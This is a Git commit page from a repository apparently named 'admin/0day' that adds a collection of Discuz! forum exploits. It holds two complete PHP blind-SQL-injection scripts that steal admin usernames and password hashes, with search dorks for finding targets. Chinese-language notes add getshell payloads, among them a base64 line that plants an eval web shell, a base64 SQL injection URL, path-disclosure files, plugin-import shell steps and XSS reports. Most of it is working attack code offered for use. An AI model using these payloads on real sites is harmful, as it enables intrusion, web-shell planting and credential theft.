admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update Discuz exp

Browse Source
This commit is contained in:
helloexp 2022-01-13 17:40:20 +08:00
parent 5f980051d0
commit fe482e9c74
27 changed files with 1294 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
CMS/Discuz/Discuz!PM短消息漏洞利用工具/discuz_exp.exe Normal file
View File

Binary file not shown.

35
CMS/Discuz/Discuz!PM短消息漏洞利用工具/dzexp.htm Normal file
View File

File diff suppressed because one or more lines are too long

BIN
CMS/Discuz/Discuz物理路径暴破器.exe Normal file
View File

Binary file not shown.

BIN
CMS/Discuz/Discz利用工具.exe Normal file
View File

Binary file not shown.

257
CMS/Discuz/discuz.php Normal file
View File

@ -0,0 +1,257 @@
<?php
print_r('
---------------------------------------------------------------------------
Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dorks: "powered by discuz! 5.0.0
"powered by discuz!
---------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to discuz
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "please wait...\n";
//from global.func.php
function authcode($string, $operation, $key = '') {
$key = $key ? $key : $GLOBALS['discuz_auth_key'];
$coded = '';
$keylength = 32;
$string = $operation == 'DECODE' ? base64_decode($string) : $string;
for($i = 0; $i < strlen($string); $i += 32) {
$coded .= substr($string, $i, 32) ^ $key;
}
$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
return $coded;
}
//stolen from install.php
function random($length) {
$hash = '';
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max = strlen($chars) - 1;
mt_srand((double)microtime() * 1000000);
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);}
while (1)
{
$discuz_auth_key=random(32);
$packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
$packet.="User-Agent: $agent\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$html=html_entity_decode($html);
$html=str_replace("<br />","",$html);
$t=explode("AND m.password='",$html);
$t2=explode("' ",$t[1]);
$pwd_f=$t2[0];
$t=explode("AND m.secques='",$html);
$t2=explode("'\n",$t[1]);
$secques_f=$t2[0];
$t=explode("AND m.uid='",$html);
$t2=explode("'\x0d",$t[1]);
$uid_f=$t2[0];
$my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
break;
}
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j<32; $j++){
for ($i=0; $i<255; $i++){
$aa="";
if ($j<>0){
for ($k=1; $k<=$j; $k++){
$aa.="a";
}
}
$GLOBALS['discuz_auth_key']=$aa.chr($i);
$t = authcode($temp,"DECODE");
if ($t[$j]==$my_string[$j]){
$key.=chr($i);
}
}
}
//echo "AUTH KEY ->".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;
echo "pwd hash (md5) -> ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
//you can use every char because of base64_decode()...so this bypass magic quotes...
//and some help by extract() to overwrite vars
$sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("action=groupexpiry",$html)){
$password.=chr($i);echo chr($i);sleep(1);break;
}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
echo "\nadmin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("action=groupexpiry",$html)){
$admin.=chr($i);echo chr($i);sleep(1);break;
}
if ($i==255) {die("\nExploit failed...");}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {
echo "exploit succeeded...";
}
else {
echo "exploit failed...";
}
?>

BIN
CMS/Discuz/discuz/discuz_exp.exe Normal file
View File

Binary file not shown.

35
CMS/Discuz/discuz/dzexp.htm Normal file
View File

File diff suppressed because one or more lines are too long

13
CMS/Discuz/discuz2.5x/DZ(discuz) x2.5 爆路径漏洞 0day.txt Normal file
View File

@ -0,0 +1,13 @@
DZ(discuz) x2.5 爆路径漏洞 0day
/* just for search
DZ x2.5 爆路径 绝对路径 dzx2.5爆路径 dz2.5爆路径 dz x.25 Dz x.25 DZ 2.5
*/
白肚 & 股沟 没找到dzx2.5的爆路径的漏洞 遂拿自己写的那个白盒测试挖洞辅助工具
果断秒杀之 发出来共享之
爆路径文件如下:
/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php

153
CMS/Discuz/discuz2.5x/DZ2.5 最新0day漏洞exp.txt Normal file
View File

@ -0,0 +1,153 @@
DZ2.5 最新0day漏洞exp
漏洞标题: Discuz!X2.5Release20120407版命令执行
漏洞文件upload\source\class\helper\helper_seo.php
在后台设置了,前台就能通过添加特殊内容进行命令执行
先上图后上代码 大家目测吧
PS: Discuz!是开源产品,很容易通过对比的手段找到以前的修正过的问题,希望相关的站长做好升级
'---------------------------------------------------------------------------------------------------
if(!defined(IN_DISCUZ)) {
@@ -89,7 +89,7 @@
}
}
if($searcharray && $replacearray) {
- $content = preg_replace(“/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies”, helper_seo::base64_transform(“encode”, “”, “\\1\\2\\3″, “”), $content);
+ $content = preg_replace(“/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies”, “helper_seo::base64_transform(encode, ”, \\1\\2\\3, ”)”, $content);
$content = preg_replace($searcharray, $replacearray, $content, 1);
$content = preg_replace(“/(.*?)/ies”, “helper_seo::base64_transform(decode, ”, \\1, ”)”, $content);
}
@@ -100,7 +100,7 @@///www.hake.cc
public static function base64_transform($type, $prefix, $string, $suffix) {
if($type == encode) {
- return $prefix.base64_encode(str_replace(“\’”, “‘”, $string)).$suffix; // -
+ return $prefix.base64_encode(str_replace(“\\\”", “\”", $string)).$suffix;
} elseif($type == decode) {
return $prefix.base64_decode($string).$suffix;
}
够清楚吧,问题在/source/class/helper/helper_seo.php 92行附近的
1
$content = preg_replace(“/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies”, helper_seo::base64_transform(“encode”, ““, “\\1\\2\\3″, ““), $content);
preg_replace 使用了e修正符又是双引号所以导致远程任意代码执行。
需要论坛支持个功能啥功能看68行 $_G['cache']['relatedlink']grep下relatedlink一路跟具体代码先不贴找到需要后台开个seo功能在运营-关联链接 /admin.php?frames=yes&action=misc&operation=relatedlink且至少需要设置一个链接这功能不是所有管理员都开但是我觉得大部分都会开如果不开它就只能是个后台拿shell的tips了。
1
2
3
4
function_core.php 1925
function parse_related_link($content, $extent) {
return helper_seo::parse_related_link($content, $extent);
}
看正则
“/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies”
PS 影响版本有Discuz!X2.5Release20120407betarc 版命令执行
1.注册任意账户
2.登陆用户发表blog日志注意是日志
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志论坛根目录下生成demo.php一句发密码c
那么利用方式还用说么? 各种地方比如 source/include/space/space_blog.php 的checkhtml 函数
同样本人贴出相关代码提供大家大牛参考 请大牛不要D小站 本站只是发表文章 不防D的 一D就挂
function checkhtml($html) {
if(!checkperm('allowhtml')) {
preg_match_all("/\<([^\<]+)\>/is", $html, $ms);
$searchs[] = '<';
$replaces[] = '<';
$searchs[] = '>';
$replaces[] = '>';
if($ms[1]) {
$allowtags = 'img|a|font|div|table|tbody|caption|tr|td|th|br|p|b|strong|i|u|em|span|ol|ul|li|blockquote|object|param|embed';
$ms[1] = array_unique($ms[1]);
foreach ($ms[1] as $value) {
$searchs[] = "<".$value.">";
$value = str_replace('&', '_uch_tmp_str_', $value);
$value = dhtmlspecialchars($value);
$value = str_replace('_uch_tmp_str_', '&', $value);
$value = str_replace(array('\\','/*'), array('.','/.'), $value);
$skipkeys = array('onabort','onactivate','onafterprint','onafterupdate','onbeforeactivate','onbeforecopy','onbeforecut','onbeforedeactivate',
'onbeforeeditfocus','onbeforepaste','onbeforeprint','onbeforeunload','onbeforeupdate','onblur','onbounce','oncellchange','onchange',
'onclick','oncontextmenu','oncontrolselect','oncopy','oncut','ondataavailable','ondatasetchanged','ondatasetcomplete','ondblclick',
'ondeactivate','ondrag','ondragend','ondragenter','ondragleave','ondragover','ondragstart','ondrop','onerror','onerrorupdate',
'onfilterchange','onfinish','onfocus','onfocusin','onfocusout','onhelp','onkeydown','onkeypress','onkeyup','onlayoutcomplete',
'onload','onlosecapture','onmousedown','onmouseenter','onmouseleave','onmousemove','onmouseout','onmouseover','onmouseup','onmousewheel',
'onmove','onmoveend','onmovestart','onpaste','onpropertychange','onreadystatechange','onreset','onresize','onresizeend','onresizestart',
'onrowenter','onrowexit','onrowsdelete','onrowsinserted','onscroll','onselect','onselectionchange','onselectstart','onstart','onstop',
'onsubmit','onunload','javascript','script','eval','behaviour','e-xpression','style','class');
$skipstr = implode('|', $skipkeys);
$value = preg_replace(array("/($skipstr)/i"), '.', $value);
if(!preg_match("/^[\/|\s]?($allowtags)(\s+|$)/is", $value)) {
$value = '';
}
$replaces[] = empty($value)?'':"<".str_replace('"', '"', $value).">";
}
}
$html = str_replace($searchs, $replaces, $html);
}
return $html;
}

69
CMS/Discuz/discuz2.5x/Discuz X2.5 最新GetShell 0day 详细利用方法.txt Normal file
View File

@ -0,0 +1,69 @@
Discuz X2.5 最新GetShell 0day 详细利用方法
听说Discuz!这次又出漏洞了这次还是个GetShell漏洞呀。这个漏洞比较新应该很多站还没更新吧。影响版本有20120407betarc
Discuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号
在实现上存在远程命令执行漏洞,远程攻击者可利用此漏洞执行远程任意代码。
要成功利用此漏洞需要目标启用seo功能。
下面说下利用方法
1.注册任意账户
2.登陆用户发表blog日志注意是日志
3.添加图片,选择网络图片,地址写入 ↓
{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志论坛根目录下生成demo.php一句发密码c
漏洞要开启seo并且开启用户日志的seo漏洞鸡肋黑站就算了。
补充一下吧开seo没错但是并非他说的非得开日志的seo我上面文章中说的 “各种地方比如 source/include/space/space_blog.php
懂的都懂了” 只是随便提个例子而已,其实在任何能够发表文章的地方都可以,最简单的,论坛找个板块发贴子就行,
这主要看管理员开启了哪个位置的seo如果不知道管理员开了哪的seo就到处都发一下。
利用方式也并非非得发blog也不是非得发网络图片详细的利用我是比如随便发个贴子内容
${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}
然后给他加上任意超链接发布即可phpinfo()enjoy it :)

5
CMS/Discuz/discuz2.5x/Discuz X2.5最新版爆路径0day漏洞.txt Normal file
View File

@ -0,0 +1,5 @@
Discuz X2.5最新版爆路径0day漏洞
漏洞证明http://www.erdare.com/source/plugin/myrepeats/table/table_myrepeats.php
修复方案:加!defined(IN_UC) && exit(Access Denied);就好了

19
CMS/Discuz/discuz2.5x/Discuz! X2.5 类似鸡肋存储Xss.txt Normal file
View File

@ -0,0 +1,19 @@
Discuz! X2.5 类似鸡肋存储Xss
漏洞详情
披露状态:
2012-09-16 细节已通知厂商并且等待厂商处理中
2012-09-21 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
鸡肋存储XSS
详细说明:
貌似鸡肋,因为要造成XSS是需要有一定的权限比如论坛的斑竹什么的普通会员的话好像不行因为存在XSS的地方是一个转账功能而在此转账功能下面还有一个留言框而造成XSS的就是这个留言框。此留言框未做任务过滤处理。经测试用一个有权限的帐号给一个普通帐号转账附带留言XSS.可成功获取cookie.

6
CMS/Discuz/discuz2.5x/Discuz! X2.5 远程代码执行漏洞.txt Normal file
View File

@ -0,0 +1,6 @@
Discuz! X2.5 远程代码执行漏洞
测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!1.1.注册任意账户2.2.登陆用户发表blog日志注意是日志3.3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}4.4.访问日志论坛根目录下生成demo.php一句话密码C

21
CMS/Discuz/discuz2.5x/DiscuzX2个人空间图片EXIF信息XSS.txt Normal file
View File

@ -0,0 +1,21 @@
DiscuzX2个人空间图片EXIF信息XSS
简要描述:
DiscuzX2个人空间图片EXIF信息XSS
详细说明:
图片里插入非法的EXIF信息。你懂的
xss漏洞产生。。。不过有点鸡肋在特定条件下才能读取到EXIF信息。
漏洞证明:
图片里插入非法的EXIF信息。你懂的

10
CMS/Discuz/discuz2.5x/discuz X25 某功能存在 xss漏洞.txt Normal file
View File

@ -0,0 +1,10 @@
discuz X25 某功能存在 xss漏洞
简要描述:
discuz X25 某功能存在 xss漏洞 html 脚本未过滤
详细说明:
discuz X25 广播回复存在 xss漏洞 html、脚本未过滤

12
CMS/Discuz/discuz2.5x/discuz x1.5 discuz 7.2 后台getshell 0day通杀0day.txt Normal file
View File

@ -0,0 +1,12 @@
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day
discuz x1.5 discuz 7.2 后台getshell 0day通杀版
方法为:
后台:插件--添加插件--请选择导入方式:上传本帖附件中的XML文件 并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误!!)
然后确认
shell地址就为data/plugindata/shell.lang.php (discuz x1.5 )
shell地址就为forumdata/plugins/shell.lang.php (discuz 7.2)
http://www.st999.cn/blog/tools/discuzshell.rar

29
CMS/Discuz/discuz2.5x/discuz!X2.0 SQL injection.txt Normal file
View File

@ -0,0 +1,29 @@
discuz!X2.0 SQL injection
文件source\module\forum\forum_attachment.php
if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('NOROBOT', TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|', base64_decode($_G['gp_aid']));
if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {9 d3 c J: W& N) ~ H9 A$ ^
dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach['tid']);
};
变量aid 直接base64_decode 后传入 SQL查询造成注射漏洞。。。
http://www.xxxx.net/aforum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D
转向后网址
http://www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member
暴出表名 pre_common_admincp_member
实际查询为:
$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
//die (urlencode(base64_encode($x)));
本文来源于独自等待博客http://www.waitalone.cn/ 原文地址http://www.waitalone.cn/post/908.html

255
CMS/Discuz/discuz4.1.php Normal file
View File

@ -0,0 +1,255 @@
<?php
print_r('
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "powered by discuz!
---------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to discuz
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "please wait...\n";
//from global.func.php
function authcode($string, $operation, $key = '') {
$key = $key ? $key : $GLOBALS['discuz_auth_key'];
$coded = '';
$keylength = 32;
$string = $operation == 'DECODE' ? base64_decode($string) : $string;
for($i = 0; $i < strlen($string); $i += 32) {
$coded .= substr($string, $i, 32) ^ $key;
}
$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
return $coded;
}
//stolen from install.php
function random($length) {
$hash = '';
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max = strlen($chars) - 1;
mt_srand((double)microtime() * 1000000);
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);}
while (1)
{
$discuz_auth_key=random(32);
$packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
$packet.="User-Agent: $agent\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$html=html_entity_decode($html);
$html=str_replace("<br />","",$html);
$t=explode("AND m.password='",$html);
$t2=explode("' ",$t[1]);
$pwd_f=$t2[0];
$t=explode("AND m.secques='",$html);
$t2=explode("'\n",$t[1]);
$secques_f=$t2[0];
$t=explode("AND m.uid='",$html);
$t2=explode("'\x0d",$t[1]);
$uid_f=$t2[0];
$my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
break;
}
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j<32; $j++){
for ($i=0; $i<255; $i++){
$aa="";
if ($j<>0){
for ($k=1; $k<=$j; $k++){
$aa.="a";
}
}
$GLOBALS['discuz_auth_key']=$aa.chr($i);
$t = authcode($temp,"DECODE");
if ($t[$j]==$my_string[$j]){
$key.=chr($i);
}
}
}
//echo "AUTH KEY ->".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;
echo "pwd hash (md5) -> ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
//you can use every char because of base64_decode()...so this bypass magic quotes...
//and some help by extract() to overwrite vars
$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("action=groupexpiry",$html)){
$password.=chr($i);echo chr($i);sleep(1);break;
}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
echo "\nadmin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("action=groupexpiry",$html)){
$admin.=chr($i);echo chr($i);sleep(1);break;
}
if ($i==255) {die("\nExploit failed...");}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {
echo "exploit succeeded...";
}
else {
echo "exploit failed...";
}
?>

25
CMS/Discuz/discuz7/Discuz 某插件SQL注入漏洞.txt Normal file
View File

@ -0,0 +1,25 @@
Discuz 某插件SQL注入漏洞
漏洞详情
披露状态:
2012-08-15 细节已通知厂商并且等待厂商处理中
2012-08-20 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
Discuz某插件SQL注入漏洞
详细说明:
可注入点xxxx/plugin.php
可注入参数imesljtypem,orderby,page,telid
漏洞证明:
贴一个ljtype的
随便找一个

213
CMS/Discuz/discuz7/Discuz! 7.1 & 7.2 远程代码执行漏洞.txt Normal file
View File

@ -0,0 +1,213 @@
Discuz! 7.1 & 7.2 远程代码执行漏洞
别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化因此有安装插件的用户不受影响。
漏洞介绍:
Discuz新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化可以任意提交从而可以执行任意PHP命令。
漏洞分析:
下面来分析下这个远程代码执行漏洞这个问题真的很严重可以直接写shell的
一、漏洞来自showmessage函数
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危险的用法未初始化的变量可以直接带进函数直接导致了问题产生from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
define('CACHE_FORBIDDEN', TRUE);
